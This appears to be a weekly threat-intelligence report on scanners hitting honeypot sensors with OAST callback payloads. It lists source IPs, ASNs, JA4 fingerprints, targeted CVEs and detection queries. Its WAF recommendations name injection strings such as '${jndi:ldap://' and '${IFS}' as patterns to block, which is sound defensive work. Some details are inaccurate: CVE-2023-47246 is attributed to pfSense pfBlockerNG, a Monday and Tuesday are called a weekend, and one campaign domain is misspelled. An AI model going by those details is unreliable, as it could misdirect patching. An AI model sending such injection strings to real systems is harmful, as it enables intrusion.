GreyNoise Labs Weekly OAST (Well-known Out-of-band Interaction Domains) Report • Week Ending 2026-02-06

GreyNoise has identified sustained vulnerability reconnaissance activity from 245 unique IP addresses generating 3,979 sensor sessions containing OAST callbacks across 82 distinct scanning campaigns. Analysis reveals a heterogeneous scanning landscape dominated by hosting provider infrastructure conducting broad-spectrum vulnerability detection, with anomalous TCP fingerprints indicating Nuclei scanner deployment across 20 distinct hosts.
OAST
MCP
projectdiscovery
interactsh
rce
iocs
detection engineering
cybersecurity
Author

🔮Orbie✨

Published

February 7, 2026

Overview

During the week of January 31 - February 7, 2026, GreyNoise sensors observed 3,979 HTTP sessions from 245 unique IP addresses containing callbacks to Interactsh OAST (Out-of-band Application Security Testing) domains. The activity generated 3,707 unique OAST domains spanning 82 distinct campaign identifiers, indicating numerous independent scanning operations rather than coordinated infrastructure.

Analysis employed JA4T+JA4H fingerprint clustering, OAST domain decoding, and GreyNoise IP enrichment to characterize the scanning landscape. Key findings include:

  • Hosting Infrastructure Dominance: Top ASNs include RouterHosting LLC (AS14956, 1,084 sessions), Cloudflare (AS13335, 651 sessions), and netcup GmbH (AS214996, 545 sessions)
  • Scanner Identification: MSS value analysis reveals 1,341 sessions (33.7%) exhibit the anomalous MSS 65495 fingerprint characteristic of Nuclei scanner deployment
  • CVE Targeting: 196 distinct vulnerability tags observed, with Apache Log4j RCE (CVE-2021-44228) accounting for 1,090 attempts (27.4% of total activity)
  • Malicious Classification: GreyNoise classifies 19 of 20 top source IPs as “noise,” with established reconnaissance infrastructure dating back to November 2025

The distributed nature of campaigns, absence of IP overlap between major campaigns, and heterogeneous fingerprint patterns indicate independent security testing operations rather than coordinated threat actor infrastructure.

Temporal Analysis

Activity exhibited consistent volume across the analysis period with notable variations:

Date Sessions Unique IPs Unique Campaigns Pattern
Jan 31 699 6 11 Initial baseline
Feb 1 642 10 18 Sustained activity
Feb 2 236 7 13 Weekend reduction
Feb 3 149 11 15 Low point
Feb 4 631 12 20 Mid-week surge
Feb 5 386 12 17 Sustained
Feb 6 573 214 20 Anomalous multi-IP event
Feb 7 663 12 6 Return to baseline

Temporal Anomaly - February 6: A single day spike to 214 unique IPs (vs. baseline 6-12) occurred on February 6, driven by campaign 01p6c which recorded 204 unique IPs targeting a single OAST domain. This pattern suggests either: 1. A shared/reused OAST domain from prior scanning that triggered callbacks from cached payloads 2. Mass exploitation attempt using a common callback infrastructure

Hourly analysis reveals burst patterns concentrated in specific time windows: - Jan 31, 15:00 UTC: 273 sessions (single campaign burst) - Jan 31, 22:00 UTC: 135 sessions (campaign concentration) - Feb 1, 15:00 UTC: 112 sessions (sustained scanning window)

No consistent diurnal pattern emerged, suggesting globally distributed scanning infrastructure operating across multiple timezones.

Campaign Analysis

The 82 identified campaigns exhibit high heterogeneity, with most representing single-IP operations. Top campaigns by volume:

Campaign: lftn9 (ksort: d5v0a0)

  • Sessions: 652
  • Source IPs: 1 (172.86.66.237)
  • ASN: AS14956 (RouterHosting LLC)
  • Active Period: Jan 31 - Feb 1
  • Machine ID: af:ed:d2
  • PID: 43608
  • Fingerprint: JA4T 64240_2-4-8-1-3_1460_7 (standard MSS)
  • GreyNoise Profile: Malicious classification, 7.4M sensor hits across 4 sensors, first seen Jan 19, 2026. Full-spectrum scanner with 300+ tags including Log4j, Confluence, pfSense, and numerous CVE-specific tags. Targets 169 ports.

Campaign: ibe4q (ksort: d638bj)

  • Sessions: 603
  • Source IPs: 9 (Cloudflare-hosted)
  • ASN: AS13335 (Cloudflare, Inc.)
  • Active Period: Feb 7 (single day burst)
  • Machine ID: 4b:71:35
  • PID: 50516
  • Fingerprint: JA4T 65535_2-4-8-1-3_1380_13 (MSS 1380 - Cloudflare characteristic)
  • Pattern: Multiple IPs from same ASN suggest Cloudflare-hosted scanning infrastructure

Campaign: 7bm4o (ksort: d627ng, d61gfu, d62tr4)

  • Sessions: 545 total (245 + 210 + 90 across three runs)
  • Source IPs: 1 (152.53.55.52)
  • ASN: AS214996 (netcup GmbH)
  • Active Period: Feb 4-6 (repeated execution)
  • Machine ID: eb:b1:31
  • PIDs: 13592, 19613, 56288 (different process per run)
  • Fingerprint: JA4T 65495_2-4-8-1-3_65495_7 (Nuclei scanner MSS signature)
  • GreyNoise Profile: Malicious classification, 16.8K sensor hits across 194 sensors, first seen Feb 3, 2026. Focused targeting: Log4j, React Server Components deserialization (CVE-2025-55182).

Campaign: j6o66 (ksort: d61fft)

  • Sessions: 231
  • Source IPs: 1 (38.55.192.204)
  • ASN: AS139659 (LUCIDACLOUD LIMITED)
  • Active Period: Feb 4-5
  • Fingerprint: JA4T 64240_2-4-8-1-3_1460_7 (standard MSS)
  • GreyNoise Profile: NOT classified (no GreyNoise intelligence available)

Campaign: 01p6c (ksort: cspn4b) - Anomaly

  • Sessions: 204
  • Source IPs: 204 (one-to-one mapping)
  • ASNs: 5 distinct (AS20473, AS207990, AS202412, AS215439, AS8075)
  • Active Period: Feb 6 (single day)
  • Machine ID: 01:c9:98
  • PID: 50061
  • Pattern: Single OAST domain triggered callbacks from 204 distinct IPs. Likely represents cached payloads from earlier scanning activity or mass exploitation with shared callback infrastructure.

Infrastructure Fingerprinting

JA4 Fingerprint Analysis

Three dominant MSS patterns emerged, revealing scanner tooling:

MSS Category Sessions IPs Interpretation
MSS 1460 1,527 (38.4%) 18 Standard TCP MSS (Linux default)
MSS 65495 1,341 (33.7%) 20 Nuclei scanner signature
MSS 1380 651 (16.4%) 9 Cloudflare WARP VPN characteristic
Other 460 (11.6%) 209 Heterogeneous/unclassified

MSS 65495 Anomaly: The use of MSS 65495 is a well-documented fingerprint of the Nuclei vulnerability scanner. This non-standard value appears in JA4T fingerprints as 65495_2-4-8-1-3_65495_7, indicating explicit configuration of TCP Maximum Segment Size to this unusual value. 20 distinct IPs exhibited this fingerprint, spanning ASNs including AS214996 (netcup), AS14956 (RouterHosting), AS210083 (Privex), and AS14061 (DigitalOcean).

Cloudflare MSS 1380: All 651 sessions with MSS 1380 originated from AS13335 (Cloudflare), consistent with Cloudflare’s WARP VPN service TCP characteristics. GreyNoise confirms VPN classification for 104.28.193.87 (WARP_VPN service).

ASN Distribution

Top autonomous systems by session volume:

ASN Organization Sessions IPs Campaigns Category
AS14956 RouterHosting LLC 1,084 2 6 Hosting
AS13335 Cloudflare, Inc. 651 9 2 CDN/Hosting
AS214996 netcup GmbH 545 1 2 Hosting
AS14061 DigitalOcean, LLC 269 4 7 Cloud hosting
AS139659 LUCIDACLOUD LIMITED 256 1 2 Hosting
AS51852 Private Layer INC 210 1 3 Privacy hosting
AS20473 The Constant Company 185 178 3 Hosting (Vultr)
AS210083 Privex Inc. 158 1 9 Privacy hosting

The dominance of hosting providers and cloud infrastructure reflects the typical scanning landscape with actors operating from rented VPS infrastructure.

Payload Analysis

GreyNoise tag analysis reveals broad-spectrum vulnerability reconnaissance targeting 196 distinct vulnerability classes:

Top CVE Targets

CVE / Payload Type Sessions Unique IPs Description
Apache Log4j RCE (CVE-2021-44228) 1,090 94 Log4Shell JNDI injection
Fastjson RCE 319 12 Java deserialization
Generic XSS 186 19 Cross-site scripting probes
CGI Script Scanner 184 16 Legacy CGI vulnerabilities
Generic ${IFS} RCE 142 9 Bash command injection
pfSense pfBlockerNG (CVE-2023-47246) 136 7 Command injection
Draytek Vigor (CVE-2024-12987) 126 4 Router command injection
GPON Router (CVE-2018-10561) 112 15 Router worm attempts
Path Traversal 92 15 Directory traversal
Seagate BlackArmor 62 14 NAS RCE attempts

Payload Characteristics

  • Deserialization Targets: Fastjson, XStream, Apache OFBiz, Oracle WebLogic - focus on Java deserialization chains
  • IoT/Edge Devices: GPON routers, Draytek, pfSense, Zyxel, Totolink - embedded device targeting
  • Enterprise Software: Atlassian Confluence (CVE-2022-26134), VMware vCenter, FortiOS, Citrix
  • CMS/Web Apps: WordPress plugins (multiple SQLi/RCE vulnerabilities), Joomla, Drupal

No evidence of active exploitation or malware delivery infrastructure. Activity patterns consistent with vulnerability research, CVE validation, and attack surface mapping.

GreyNoise Enrichment Analysis

GreyNoise multi-IP check on top 20 source IPs revealed: - 19/20 classified as “noise” (active Internet scanners) - 0/20 identified as common business services (not CDN/legitimate traffic) - 1/20 no classification (38.55.192.204 - potentially new infrastructure)

Notable GreyNoise Profiles

172.86.66.237 (RouterHosting LLC)

  • Classification: MALICIOUS
  • First Seen: Jan 19, 2026 (pre-dates analysis window)
  • Sensor Hits: 7,418,938 across 4 sensors
  • Tags: 300+ vulnerability-specific tags (full-spectrum scanner)
  • Scanned Ports: 169 ports (comprehensive port scanning)
  • Bot: No | Tor: No | VPN: No
  • Assessment: Established reconnaissance infrastructure, long-term persistent scanning

152.53.55.52 (netcup GmbH)

  • Classification: MALICIOUS
  • First Seen: Feb 3, 2026 (recent activation)
  • Sensor Hits: 16,848 across 194 sensors (broad targeting)
  • Tags: Log4j, React Server Components CVE-2025-55182, OAST domains
  • Scanned Ports: 10 (web-focused: 80, 443, 3000, 8080, 9000, etc.)
  • Bot: No | Tor: No | VPN: No
  • Assessment: Focused web vulnerability scanner, recent deployment

104.28.193.87 (Cloudflare)

  • Classification: MALICIOUS
  • First Seen: Nov 9, 2025 (long-term infrastructure)
  • Sensor Hits: 81,099 across 17 sensors
  • Tags: 400+ tags (full-spectrum scanner)
  • Scanned Ports: 5 (web-only: 80, 443, 7001, 8080, 8443)
  • Bot: No | Tor: No | VPN: Yes (WARP_VPN)
  • Assessment: Cloudflare-hosted scanning via WARP VPN, established infrastructure

Attribution Assessment

Confidence: Low

The distributed, heterogeneous nature of observed activity precludes meaningful threat actor attribution. Evidence suggests:

Evidence Supporting Independent Operations:

  1. Campaign Isolation: 82 distinct campaigns with minimal IP overlap (exception: Feb 6 anomaly)
  2. Diverse Infrastructure: 245 IPs across 45+ ASNs spanning 30+ countries
  3. Heterogeneous Tooling: Mix of Nuclei (MSS 65495), custom tooling (standard MSS), Cloudflare-hosted infrastructure
  4. Varied Targeting: While Log4j dominates, 196 distinct vulnerability classes indicate non-coordinated reconnaissance priorities
  5. Temporal Distribution: No coordinated timing patterns; activity distributed across timezones

Infrastructure Categories:

  • Bug Bounty Hunters: Single-IP campaigns with focused targeting patterns
  • Penetration Testing Tools: Nuclei scanner deployment (20 IPs)

No indicators of coordinated threat actor activity, nation-state operations, or organized criminal infrastructure.

Network IOCs

Primary Source IPs

IP Address ASN Organization Sessions Campaigns GreyNoise
172.86.66.237 AS14956 RouterHosting LLC 867 4 MALICIOUS
152.53.55.52 AS214996 netcup GmbH 545 2 MALICIOUS
104.28.193.87 AS13335 Cloudflare 389 2 MALICIOUS (VPN)
38.55.192.204 AS139659 LUCIDACLOUD 256 2 None
107.189.16.186 AS14956 RouterHosting LLC 217 2 MALICIOUS
179.43.146.42 AS51852 Private Layer INC 210 3 MALICIOUS
185.130.47.197 AS210083 Privex Inc. 158 9 MALICIOUS
209.38.59.247 AS14061 DigitalOcean 126 2 MALICIOUS
94.156.102.143 AS215439 PLAY2GO INTL 104 2 MALICIOUS
20.64.169.232 AS8075 Microsoft Corp 94 5 MALICIOUS

OAST Domain Pattern

All observed domains follow Interactsh format:

[subdomain].oast.pro

Example campaign domains: - Campaign lftn9: d5v0a0lftn9*.oast.pro (652 unique domains) - Campaign ibe4q: d638bjibe4q*.oast.pro (603 unique domains) - Campaign 7bm4o: d627ng7bm4o*.oast.pro, d61gfu7bm4o*.oast.pro, d62tr4fbm4o*.oast.pro (545 total)

Decoding Pattern: - ksort value (e.g., d5v0a0) represents timestamp + sequential identifier - campaign value (e.g., lftn9) derived from machine ID, PID, and counter - Each session generates unique subdomain for callback correlation

JA4 Fingerprints for Detection

Nuclei Scanner (MSS 65495):

JA4T: 65495_2-4-8-1-3_65495_7
JA4H: ge11nr17${jn_8062e975b6e7_*

Standard MSS (RouterHosting infrastructure):

JA4T: 64240_2-4-8-1-3_1460_7
JA4H: ge11nn020000_1af9d02f0bf7_*
JA4H: po11nn060000_4ea4093e6290_*
JA4H: ge10nn010000_4a823118b9ba_*

Cloudflare WARP VPN:

JA4T: 65535_2-4-8-1-3_1380_13
JA4H: po11nn08en00_9cf61e78b7a7_*

Detection Recommendations

  1. Monitor for Interactsh OAST callbacks in outbound DNS and HTTP traffic. Alert on requests to *.oast.pro, *.interact.sh, and *.burpcollaborator.net domains originating from internal production systems (exception: authorized security testing).

  2. JA4 fingerprint detection for Nuclei scanner identification:

    • Alert on JA4T fingerprint 65495_2-4-8-1-3_65495_7
    • Correlate with OAST callbacks for high-confidence reconnaissance detection

  3. Prioritize patching for top targeted CVEs:

    • CVE-2021-44228 (Log4Shell) - 1,090 attempts observed
    • CVE-2023-47246 (pfSense pfBlockerNG) - 136 attempts
    • CVE-2024-12987 (Draytek Vigor) - 126 attempts
    • CVE-2022-26134 (Atlassian Confluence) - 57 attempts

  4. ASN-based rate limiting for hosting providers exhibiting malicious classification:

    • AS14956 (RouterHosting LLC)
    • AS214996 (netcup GmbH)
    • AS210083 (Privex Inc.)
    • Consider geo-blocking or aggressive rate limiting for non-business-critical origins

  5. WAF rules for OAST injection patterns:

    • Block requests containing ${jndi:ldap:// (Log4j)
    • Block requests with .oast.pro, .interact.sh in headers, body, or query parameters
    • Alert on ${IFS} command injection attempts

  6. February 6 anomaly investigation: Organizations with traffic to/from the 204 IPs in campaign 01p6c should investigate for cached exploitation attempts. The spike suggests prior vulnerability with delayed OAST callbacks.

GNQL Queries

Monitor recent OAST callback activity:

tags:"Generic Contains Well-known Out-of-band Interaction Domain" last_seen:7d

Track Nuclei scanner deployment (MSS 65495):

metadata.ja4.tcp:"65495_2-4-8-1-3_65495_7" last_seen:7d

Investigate top malicious ASNs:

metadata.asn:AS14956 last_seen:7d
metadata.asn:AS214996 last_seen:7d
metadata.asn:AS13335 tags:"Generic Contains Well-known Out-of-band Interaction Domain" last_seen:7d

Log4j targeting IPs:

tags:"Apache Log4j RCE Attempt" tags:"Generic Contains Well-known Out-of-band Interaction Domain" last_seen:7d

Cloudflare-hosted scanners:

metadata.asn:AS13335 classification:malicious last_seen:7d

New/emerging scanning infrastructure (Feb 3+ first seen):

tags:"Generic Contains Well-known Out-of-band Interaction Domain" first_seen:>2026-02-03